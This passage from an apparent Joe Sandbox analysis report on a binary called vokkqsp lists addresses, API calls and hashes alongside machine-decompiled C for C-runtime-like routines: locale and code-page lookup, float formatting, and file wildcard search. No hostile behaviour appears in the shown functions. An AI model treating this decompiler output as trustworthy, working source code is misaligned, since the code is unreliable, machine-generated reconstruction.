                                                      0x00429db5
                                                      0x00429db8
                                                      0x00429db8
                                                      0x00429dba
                                                      0x00429dbd
                                                      0x00429dc1
                                                      0x00429e31
                                                      0x00429e35
                                                      0x00429e48
                                                      0x00429e4f
                                                      0x00429e55
                                                      0x00429e58
                                                      0x00429e3c
                                                      0x00429e40
                                                      0x00429e45
                                                      0x00429e45
                                                      0x00000000
                                                      0x00429dc8
                                                      0x00429dc8
                                                      0x00429dcc
                                                      0x00429de2
                                                      0x00429dd3
                                                      0x00429dd7
                                                      0x00429dd7
                                                      0x00429deb
                                                      0x00429dec
                                                      0x00429e74
                                                      0x00000000
                                                      0x00429df2
                                                      0x00429df2
                                                      0x00429e01
                                                      0x00429e06
                                                      0x00429e0b
                                                      0x00429e5b
                                                      0x00429e5b
                                                      0x00429e5d
                                                      0x00429e61
                                                      0x00429e76
                                                      0x00429e82
                                                      0x00429e8c
                                                      0x00429e92
                                                      0x00000000
                                                      0x00429eb1
                                                      0x00429eb1
                                                      0x00429eb6
                                                      0x00429eb8
                                                      0x00429eb8
                                                      0x00429ec9
                                                      0x00429ed0
                                                      0x00429f30
                                                      0x00429e65
                                                      0x00429e73
                                                      0x00429ed2
                                                      0x00429ed5
                                                      0x00429edf
                                                      0x00429ef7
                                                      0x00000000
                                                      0x00000000
                                                      0x00429eff
                                                      0x00429f16
                                                      0x00000000
                                                      0x00000000
                                                      0x00429f20
                                                      0x00429f28
                                                      0x00000000
                                                      0x00429f2d
                                                      0x00429ed0
                                                      0x00429e92
                                                      0x00429e63
                                                      0x00000000
                                                      0x00429e63
                                                      0x00429e0d
                                                      0x00429e0f
                                                      0x00429e13
                                                      0x00429e29
                                                      0x00429e1a
                                                      0x00429e1e
                                                      0x00429e1e
                                                      0x00429e2e
                                                      0x00000000
                                                      0x00429e2e
                                                      0x00429dec

                                                      APIs
                                                        • Part of subcall function 0041FEAE: GetLastError.KERNEL32(?,00000008,0042383F), ref: 0041FEB2
                                                        • Part of subcall function 0041FEAE: SetLastError.KERNEL32(00000000), ref: 0041FF54
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00429E4F
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00429E98
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00429EA7
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00429EEF
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00429F0E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                      • String ID: p-D
                                                      • API String ID: 415426439-4197150244
                                                      • Opcode ID: 6b867fe535e6abf4c83fff399363d5988ad76ecad5343528ea8f7390d334154d
                                                      • Instruction ID: dce160037436f12bf979364f714fddf4a67f41b5cf9e03819c4dae37ca7ec0e6
                                                      • Opcode Fuzzy Hash: 6b867fe535e6abf4c83fff399363d5988ad76ecad5343528ea8f7390d334154d
                                                      • Instruction Fuzzy Hash: C3518071B00225ABDF10DFA5EC41BAF77B8AF04700F95446AE914E7290DB789D40CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00429B6E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E00429B6E(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E0041ED5A(_t27, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















                                                      0x00429b74
                                                      0x00429b7b
                                                      0x00429c1f
                                                      0x00429c38
                                                      0x00429c3e
                                                      0x00429c43
                                                      0x00429c45
                                                      0x00429c45
                                                      0x00429c4b
                                                      0x00429c4e
                                                      0x00429c4e
                                                      0x00429c3a
                                                      0x00429c3a
                                                      0x00000000
                                                      0x00429c3a
                                                      0x00429b81
                                                      0x00429b86
                                                      0x00000000
                                                      0x00000000
                                                      0x00429b8c
                                                      0x00429b91
                                                      0x00429b93
                                                      0x00429b93
                                                      0x00429b99
                                                      0x00000000
                                                      0x00000000
                                                      0x00429b9e
                                                      0x00429bb5
                                                      0x00429bb5
                                                      0x00429bbe
                                                      0x00429bc0
                                                      0x00000000
                                                      0x00000000
                                                      0x00429bc2
                                                      0x00429bc7
                                                      0x00429bc9
                                                      0x00429bc9
                                                      0x00429bcf
                                                      0x00000000
                                                      0x00000000
                                                      0x00429bd4
                                                      0x00429bf2
                                                      0x00429bf4
                                                      0x00429c17
                                                      0x00000000
                                                      0x00429c1c
                                                      0x00429c0f
                                                      0x00000000
                                                      0x00000000
                                                      0x00429c11
                                                      0x00000000
                                                      0x00429c11
                                                      0x00429bd6
                                                      0x00429bde
                                                      0x00000000
                                                      0x00000000
                                                      0x00429be0
                                                      0x00429be3
                                                      0x00429be9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00429beb
                                                      0x00429bed
                                                      0x00429bef
                                                      0x00000000
                                                      0x00429bef
                                                      0x00429ba0
                                                      0x00429ba8
                                                      0x00000000
                                                      0x00000000
                                                      0x00429baa
                                                      0x00429bad
                                                      0x00429bb3
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00429bb3
                                                      0x00429bb9
                                                      0x00429bbb
                                                      0x00000000

                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,00429E8C,00000002,00000000,?,?,?,00429E8C,?,00000000), ref: 00429C07
                                                      • GetLocaleInfoW.KERNEL32(?,20001004,00429E8C,00000002,00000000,?,?,?,00429E8C,?,00000000), ref: 00429C30
                                                      • GetACP.KERNEL32(?,?,00429E8C,?,00000000), ref: 00429C45
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      • API String ID: 2299586839-711371036
                                                      • Opcode ID: 3feca7d4cd02c3912f9e31c760880638cee1ff087994a38edfe4509515814352
                                                      • Instruction ID: d6879416e45c0c3f5020641951b97e68572d89d4bab9cd97f474f57a18bd2a31
                                                      • Opcode Fuzzy Hash: 3feca7d4cd02c3912f9e31c760880638cee1ff087994a38edfe4509515814352
                                                      • Instruction Fuzzy Hash: 4D21BC32B00121AAE7348F15F901B9777A6BB50B10F968066EA0A87204E736EE41C35C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0042C27E Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODECrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E0042C27E(signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t87;
				void* _t93;
				intOrPtr _t94;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t111;
				void* _t113;
				signed int _t114;
				void* _t115;
				void* _t118;
				void* _t120;
				void* _t122;
				signed int* _t124;
				void* _t127;
				signed int _t129;
				signed int _t131;
				signed int _t136;
				signed int* _t140;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				void* _t161;
				unsigned int _t162;
				intOrPtr _t171;
				signed int _t173;
				signed int* _t174;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				intOrPtr _t189;
				void* _t190;

				_t186 = _a24;
				if(_t186 < 0) {
					_t186 = 0;
				}
				_t183 = _a8;
				_t3 = _t186 + 0xb; // 0xb
				 *_t183 = 0;
				if(_a12 > _t3) {
					_t140 = _a4;
					_t147 = _t140[1];
					_t173 =  *_t140;
					__eflags = (_t147 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if(__eflags != 0) {
						__eflags = _t147;
						if(__eflags > 0) {
							L13:
							_t20 = _t183 + 1; // 0x2
							_t174 = _t20;
							_t87 = _a28 ^ 0x00000001;
							_v20 = 0x3ff;
							_v5 = _t87;
							_v16 = _t174;
							_v48 = ((_t87 & 0x000000ff) << 5) + 7;
							__eflags = _t147 & 0x7ff00000;
							_t93 = 0x30;
							if((_t147 & 0x7ff00000) != 0) {
								 *_t183 = 0x31;
								L18:
								_t149 = 0;
								__eflags = 0;
								L19:
								_t28 =  &(_t174[0]); // 0x2
								_t184 = _t28;
								__eflags = _t186;
								if(_t186 != 0) {
									_t94 = _a40;
									__eflags =  *((char*)(_t94 + 0x14));
									if( *((char*)(_t94 + 0x14)) == 0) {
										E0041C290(_t94, _t174);
										_t94 = _a40;
										_t174 = _v16;
									}
									_t149 = 0;
									__eflags = 0;
									_t98 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)) + 0x88))))));
								} else {
									_t98 = _t149;
								}
								 *_t174 = _t98;
								_t100 = _t140[1] & 0x000fffff;
								__eflags = _t100;
								_v40 = _t100;
								if(_t100 > 0) {
									L26:
									_t175 = _t149;
									_t150 = 0xf0000;
									_t101 = 0x30;
									_v12 = _t101;
									_v24 = _t149;
									_v28 = 0xf0000;
									while(1) {
										_v32 = _v12 & 0x0000ffff;
										_t104 = _t184;
										_v36 = _t184;
										_v40 = _t186;
										__eflags = _t186;
										if(__eflags <= 0) {
											break;
										}
										_t127 = E0043A520( *_t140 & _t175, _v32 & 0x0000ffff, _t140[1] & _t150 & 0x000fffff);
										_t161 = 0x30;
										_t129 = _t127 + _t161 & 0x0000ffff;
										__eflags = _t129 - 0x39;
										if(_t129 > 0x39) {
											_t129 = _t129 + _v48;
											__eflags = _t129;
										}
										_t162 = _v28;
										_t175 = (_t162 << 0x00000020 | _v24) >> 4;
										 *_t184 = _t129;
										_t184 = _t184 + 1;
										_t150 = _t162 >> 4;
										_t131 = _v12 - 4;
										_t186 = _t186 - 1;
										_v24 = (_t162 << 0x00000020 | _v24) >> 4;
										_v28 = _t162 >> 4;
										_v12 = _t131;
										__eflags = _t131;
										if(_t131 >= 0) {
											continue;
										} else {
											goto L43;
										}
									}
									_t186 = _v40;
									_t184 = _t104;
									_t105 = E0042CAAF(__eflags, _t140, _t175, _t150, _v32, _a36);
									_t190 = _t190 + 0x14;
									__eflags = _t105;
									if(_t105 == 0) {
										goto L43;
									}
									_t184 = _v36;
									_t146 = 0x30;
									_t124 = _t184 - 1;
									while(1) {
										_t156 =  *_t124;
										__eflags = _t156 - 0x66;
										if(_t156 == 0x66) {
											goto L36;
										}
										__eflags = _t156 - 0x46;
										if(_t156 != 0x46) {
											_t140 = _a4;
											__eflags = _t124 - _v16;
											if(_t124 == _v16) {
												_t65 = _t124 - 1;
												 *_t65 =  *(_t124 - 1) + 1;
												__eflags =  *_t65;
											} else {
												__eflags = _t156 - 0x39;
												if(_t156 != 0x39) {
													_t157 = _t156 + 1;
													__eflags = _t157;
												} else {
													_t157 = _v48 + 0x3a;
												}
												 *_t124 = _t157;
											}
											goto L43;
										}
										L36:
										 *_t124 = _t146;
										_t124 = _t124 - 1;
									}
								} else {
									__eflags =  *_t140 - _t149;
									if( *_t140 <= _t149) {
										L43:
										__eflags = _t186;
										if(_t186 > 0) {
											_push(_t186);
											_t122 = 0x30;
											_push(_t122);
											_push(_t184);
											E00403D00(_t184);
											_t184 = _t184 + _t186;
											__eflags = _t184;
										}
										_t106 = _v16;
										__eflags =  *_t106;
										if( *_t106 == 0) {
											_t184 = _t106;
										}
										 *_t184 = (_v5 << 5) + 0x50;
										_t176 = _t140[1];
										_t111 = E0043A520( *_t140, 0x34, _t176);
										_t141 = 0;
										_t188 = _t176 & 0;
										_t70 = _t184 + 2; // 0x2
										_t177 = _t70;
										_t154 = (_t111 & 0x000007ff) - _v20;
										__eflags = _t154;
										_v48 = _t177;
										asm("sbb esi, ebx");
										if(__eflags < 0) {
											L51:
											_t154 =  ~_t154;
											asm("adc esi, ebx");
											_t188 =  ~_t188;
											0x2b = 0x2d;
											goto L52;
										} else {
											if(__eflags > 0) {
												L50:
												L52:
												 *(_t184 + 1) = 0x2b;
												_t185 = _t177;
												_t113 = 0x30;
												 *_t177 = _t113;
												__eflags = _t188 - _t141;
												if(__eflags < 0) {
													L61:
													_t178 = 0x30;
													L62:
													__eflags = _t188 - _t141;
													if(__eflags < 0) {
														L66:
														_t155 = _t154 + _t178;
														__eflags = _t155;
														 *_t185 = _t155;
														 *(_t185 + 1) = _t141;
														L67:
														_t114 = 0;
														__eflags = 0;
														L68:
														return _t114;
													}
													if(__eflags > 0) {
														L65:
														_push(_t141);
														_push(_t141);
														_push(0xa);
														_push(_t188);
														_push(_t154);
														_t115 = E0043A420();
														_v48 = _t178;
														_t178 = 0x30;
														 *_t185 = _t115 + _t178;
														_t185 = _t185 + 1;
														_t141 = 0;
														__eflags = 0;
														goto L66;
													}
													__eflags = _t154 - 0xa;
													if(_t154 < 0xa) {
														goto L66;
													}
													goto L65;
												}
												if(__eflags > 0) {
													L55:
													_push(_t141);
													_push(_t141);
													_push(0x3e8);
													_push(_t188);
													_push(_t154);
													_t118 = E0043A420();
													_t188 = _t141;
													_v40 = _t177;
													_t177 = _v48;
													_t141 = 0;
													_t185 = _t177 + 1;
													 *_t177 = _t118 + 0x30;
													__eflags = _t185 - _t177;
													if(_t185 != _t177) {
														L59:
														_push(_t141);
														_push(_t141);
														_push(0x64);
														_push(_t188);
														_push(_t154);
														_t120 = E0043A420();
														_t188 = _t141;
														_v40 = _t177;
														_t141 = 0;
														_t178 = 0x30;
														 *_t185 = _t120 + _t178;
														_t185 = _t185 + 1;
														__eflags = _t185 - _v48;
														if(_t185 != _v48) {
															goto L65;
														}
														goto L62;
													}
													L56:
													__eflags = _t188 - _t141;
													if(__eflags < 0) {
														goto L61;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t154 - 0x64;
													if(_t154 < 0x64) {
														goto L61;
													}
													goto L59;
												}
												__eflags = _t154 - 0x3e8;
												if(_t154 < 0x3e8) {
													goto L56;
												}
												goto L55;
											}
											__eflags = _t154;
											if(_t154 < 0) {
												goto L51;
											}
											goto L50;
										}
									}
									goto L26;
								}
							}
							 *_t183 = _t93;
							_t149 =  *_t140 | _t140[1] & 0x000fffff;
							__eflags = _t149;
							if(_t149 != 0) {
								_v20 = 0x3fe;
								goto L18;
							}
							_v20 = _t149;
							goto L19;
						}
						if(__eflags < 0) {
							L12:
							 *_t183 = 0x2d;
							_t183 = _t183 + 1;
							__eflags = _t183;
							_t147 = _t140[1];
							goto L13;
						}
						__eflags = _t173;
						if(_t173 >= 0) {
							goto L13;
						}
						goto L12;
					}
					_t114 = E0042C5AA(_t140, _t147, __eflags, _t140, _t183, _a12, _a16, _a20, _t186, 0, _a32, _a36, _a40);
					__eflags = _t114;
					if(_t114 == 0) {
						_t136 = E0043F450(_t183, 0x65);
						__eflags = _t136;
						if(_t136 != 0) {
							 *_t136 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							 *((char*)(_t136 + 3)) = 0;
						}
						goto L67;
					}
					 *_t183 = 0;
					goto L68;
				}
				_t171 = _a40;
				_t189 = 0x22;
				 *((char*)(_t171 + 0x1c)) = 1;
				 *((intOrPtr*)(_t171 + 0x18)) = _t189;
				E0041F0ED(_t183, _t189, 0, 0, 0, 0, 0, _t171);
				return _t189;
			}






























































                                                      0x0042c289
                                                      0x0042c28f
                                                      0x0042c291
                                                      0x0042c291
                                                      0x0042c293
                                                      0x0042c296
                                                      0x0042c299
                                                      0x0042c29e
                                                      0x0042c2c3
                                                      0x0042c2c6
                                                      0x0042c2cb
                                                      0x0042c2d5
                                                      0x0042c2da
                                                      0x0042c333
                                                      0x0042c335
                                                      0x0042c344
                                                      0x0042c347
                                                      0x0042c347
                                                      0x0042c34a
                                                      0x0042c34c
                                                      0x0042c353
                                                      0x0042c365
                                                      0x0042c368
                                                      0x0042c36d
                                                      0x0042c371
                                                      0x0042c372
                                                      0x0042c392
                                                      0x0042c395
                                                      0x0042c395
                                                      0x0042c395
                                                      0x0042c397
                                                      0x0042c397
                                                      0x0042c397
                                                      0x0042c39a
                                                      0x0042c39c
                                                      0x0042c3a2
                                                      0x0042c3a5
                                                      0x0042c3a9
                                                      0x0042c3ad
                                                      0x0042c3b2
                                                      0x0042c3b5
                                                      0x0042c3b5
                                                      0x0042c3bb
                                                      0x0042c3bb
                                                      0x0042c3c5
                                                      0x0042c39e
                                                      0x0042c39e
                                                      0x0042c39e
                                                      0x0042c3c7
                                                      0x0042c3cc
                                                      0x0042c3cc
                                                      0x0042c3d1
                                                      0x0042c3d4
                                                      0x0042c3de
                                                      0x0042c3e0
                                                      0x0042c3e2
                                                      0x0042c3e7
                                                      0x0042c3e8
                                                      0x0042c3eb
                                                      0x0042c3ee
                                                      0x0042c3f1
                                                      0x0042c3f7
                                                      0x0042c3fa
                                                      0x0042c3fc
                                                      0x0042c3ff
                                                      0x0042c402
                                                      0x0042c404
                                                      0x00000000
                                                      0x00000000
                                                      0x0042c41b
                                                      0x0042c422
                                                      0x0042c426
                                                      0x0042c429
                                                      0x0042c42c
                                                      0x0042c42e
                                                      0x0042c42e
                                                      0x0042c42e
                                                      0x0042c434
                                                      0x0042c437
                                                      0x0042c43b
                                                      0x0042c43d
                                                      0x0042c441
                                                      0x0042c444
                                                      0x0042c447
                                                      0x0042c448
                                                      0x0042c44b
                                                      0x0042c44e
                                                      0x0042c451
                                                      0x0042c454
                                                      0x00000000
                                                      0x0042c456
                                                      0x00000000
                                                      0x0042c456
                                                      0x0042c454
                                                      0x0042c45b
                                                      0x0042c45e
                                                      0x0042c466
                                                      0x0042c46b
                                                      0x0042c46e
                                                      0x0042c470
                                                      0x00000000
                                                      0x00000000
                                                      0x0042c472
                                                      0x0042c477
                                                      0x0042c478
                                                      0x0042c47b
                                                      0x0042c47b
                                                      0x0042c47d
                                                      0x0042c480
                                                      0x00000000
                                                      0x00000000
                                                      0x0042c482
                                                      0x0042c485
                                                      0x0042c48c
                                                      0x0042c48f
                                                      0x0042c492
                                                      0x0042c4a7
                                                      0x0042c4a7
                                                      0x0042c4a7
                                                      0x0042c494
                                                      0x0042c494
                                                      0x0042c497
                                                      0x0042c4a1
                                                      0x0042c4a1
                                                      0x0042c499
                                                      0x0042c49c
                                                      0x0042c49c
                                                      0x0042c4a3
                                                      0x0042c4a3
                                                      0x00000000
                                                      0x0042c492
                                                      0x0042c487
                                                      0x0042c487
                                                      0x0042c489
                                                      0x0042c489
                                                      0x0042c3d6
                                                      0x0042c3d6
                                                      0x0042c3d8
                                                      0x0042c4aa
                                                      0x0042c4aa
                                                      0x0042c4ac
                                                      0x0042c4ae
                                                      0x0042c4b1
                                                      0x0042c4b2
                                                      0x0042c4b3
                                                      0x0042c4b4
                                                      0x0042c4bc
                                                      0x0042c4bc
                                                      0x0042c4bc
                                                      0x0042c4be
                                                      0x0042c4c1
                                                      0x0042c4c4
                                                      0x0042c4c6
                                                      0x0042c4c6
                                                      0x0042c4d2
                                                      0x0042c4d6
                                                      0x0042c4d9
                                                      0x0042c4de
                                                      0x0042c4ea
                                                      0x0042c4ec
                                                      0x0042c4ec
                                                      0x0042c4ef
                                                      0x0042c4ef
                                                      0x0042c4f2
                                                      0x0042c4f5
                                                      0x0042c4f7
                                                      0x0042c503
                                                      0x0042c503
                                                      0x0042c507
                                                      0x0042c509
                                                      0x0042c50b
                                                      0x00000000
                                                      0x0042c4f9
                                                      0x0042c4f9
                                                      0x0042c4ff
                                                      0x0042c50c
                                                      0x0042c50c
                                                      0x0042c50f
                                                      0x0042c513
                                                      0x0042c514
                                                      0x0042c516
                                                      0x0042c518
                                                      0x0042c574
                                                      0x0042c576
                                                      0x0042c577
                                                      0x0042c577
                                                      0x0042c579
                                                      0x0042c59c
                                                      0x0042c59c
                                                      0x0042c59c
                                                      0x0042c59e
                                                      0x0042c5a0
                                                      0x0042c5a3
                                                      0x0042c5a3
                                                      0x0042c5a3
                                                      0x0042c5a5
                                                      0x00000000
                                                      0x0042c5a5
                                                      0x0042c57b
                                                      0x0042c582
                                                      0x0042c582
                                                      0x0042c583
                                                      0x0042c584
                                                      0x0042c586
                                                      0x0042c587
                                                      0x0042c588
                                                      0x0042c591
                                                      0x0042c594
                                                      0x0042c597
                                                      0x0042c599
                                                      0x0042c59a
                                                      0x0042c59a
                                                      0x00000000
                                                      0x0042c59a
                                                      0x0042c57d
                                                      0x0042c580
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0042c580
                                                      0x0042c51f
                                                      0x0042c525
                                                      0x0042c525
                                                      0x0042c526
                                                      0x0042c527
                                                      0x0042c528
                                                      0x0042c529
                                                      0x0042c52a
                                                      0x0042c52f
                                                      0x0042c533
                                                      0x0042c538
                                                      0x0042c53b
                                                      0x0042c53d
                                                      0x0042c540
                                                      0x0042c542
                                                      0x0042c544
                                                      0x0042c551
                                                      0x0042c551
                                                      0x0042c552
                                                      0x0042c553
                                                      0x0042c555
                                                      0x0042c556
                                                      0x0042c557
                                                      0x0042c55c
                                                      0x0042c562
                                                      0x0042c565
                                                      0x0042c567
                                                      0x0042c56a
                                                      0x0042c56c
                                                      0x0042c56d
                                                      0x0042c570
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0042c572
                                                      0x0042c546
                                                      0x0042c546
                                                      0x0042c548
                                                      0x00000000
                                                      0x00000000
                                                      0x0042c54a
                                                      0x00000000
                                                      0x00000000
                                                      0x0042c54c
                                                      0x0042c54f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0042c54f
                                                      0x0042c521
                                                      0x0042c523
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0042c523
                                                      0x0042c4fb
                                                      0x0042c4fd
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0042c4fd
                                                      0x0042c4f7
                                                      0x00000000
                                                      0x0042c3d8
                                                      0x0042c3d4
                                                      0x0042c374
                                                      0x0042c380
                                                      0x0042c380
                                                      0x0042c382
                                                      0x0042c389
                                                      0x00000000
                                                      0x0042c389
                                                      0x0042c384
                                                      0x00000000
                                                      0x0042c384
                                                      0x0042c337
                                                      0x0042c33d
                                                      0x0042c33d
                                                      0x0042c340
                                                      0x0042c340
                                                      0x0042c341
                                                      0x00000000
                                                      0x0042c341
                                                      0x0042c339
                                                      0x0042c33b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0042c33b
                                                      0x0042c2f4
                                                      0x0042c2fc
                                                      0x0042c2fe
                                                      0x0042c30b
                                                      0x0042c312
                                                      0x0042c314
                                                      0x0042c326
                                                      0x0042c328
                                                      0x0042c328
                                                      0x00000000
                                                      0x0042c314
                                                      0x0042c300
                                                      0x00000000
                                                      0x0042c300
                                                      0x0042c2a0
                                                      0x0042c2a5
                                                      0x0042c2ac
                                                      0x0042c2b0
                                                      0x0042c2b3
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: _strrchr
                                                      • String ID:
                                                      • API String ID: 3213747228-0
                                                      • Opcode ID: a10bd9630aa446d874c5a721e9361ccfdeb72b8b04ace7e274a6afb9a54e192b
                                                      • Instruction ID: e4170047a23a2e839c7d9630c7df9f60d863b46ab1757c88f9f85005f0960d63
                                                      • Opcode Fuzzy Hash: a10bd9630aa446d874c5a721e9361ccfdeb72b8b04ace7e274a6afb9a54e192b
                                                      • Instruction Fuzzy Hash: 81B13332A042659FDB118E68D8D17FFBBA5EF59314F54816BE804AB341C238ED41CBA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004243EC Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E004243EC(void* __ebx, void* __edi, void* __esi, WCHAR* _a4, signed short* _a8, char* _a12) {
				signed int _v8;
				short _v552;
				short _v554;
				struct _WIN32_FIND_DATAW _v600;
				char _v601;
				signed int _v608;
				signed int _v612;
				intOrPtr _v616;
				signed int _t30;
				signed char _t32;
				void* _t41;
				intOrPtr _t43;
				int _t48;
				union _FINDEX_INFO_LEVELS _t62;
				intOrPtr* _t63;
				char* _t64;
				signed short* _t69;
				WCHAR* _t75;
				signed int _t78;
				void* _t79;

				_t30 =  *0x44b018; // 0x1989d38f
				_v8 = _t30 ^ _t78;
				_t69 = _a8;
				_t64 = _a12;
				_t75 = _a4;
				_v608 = _t64;
				if(_t69 != _t75) {
					while(E004246AE( *_t69 & 0x0000ffff) == 0) {
						_t69 = _t69 - 2;
						if(_t69 != _t75) {
							continue;
						}
						break;
					}
					_t64 = _v608;
				}
				_t77 =  *_t69 & 0x0000ffff;
				if(( *_t69 & 0x0000ffff) != 0x3a || _t69 ==  &(_t75[1])) {
					_t64 =  &_v601;
					_t32 = E004246AE(_t77);
					asm("sbb eax, eax");
					_t62 = 0;
					_v612 =  ~(_t32 & 0x000000ff) & (_t69 - _t75 >> 0x00000001) + 0x00000001;
					_t77 = FindFirstFileExW(_t75, 0,  &_v600, 0, 0, 0);
					if(_t77 != 0xffffffff) {
						_t63 = _v608;
						_v608 =  *((intOrPtr*)(_t63 + 4)) -  *_t63 >> 2;
						_t41 = 0x2e;
						do {
							if(_v600.cFileName != _t41 || _v554 != 0 && (_v554 != _t41 || _v552 != 0)) {
								_push(_t63);
								_t43 = L004240B3(_t63, _t64, _t75, _t77,  &(_v600.cFileName), _t75, _v612);
								_t79 = _t79 + 0x10;
								_v616 = _t43;
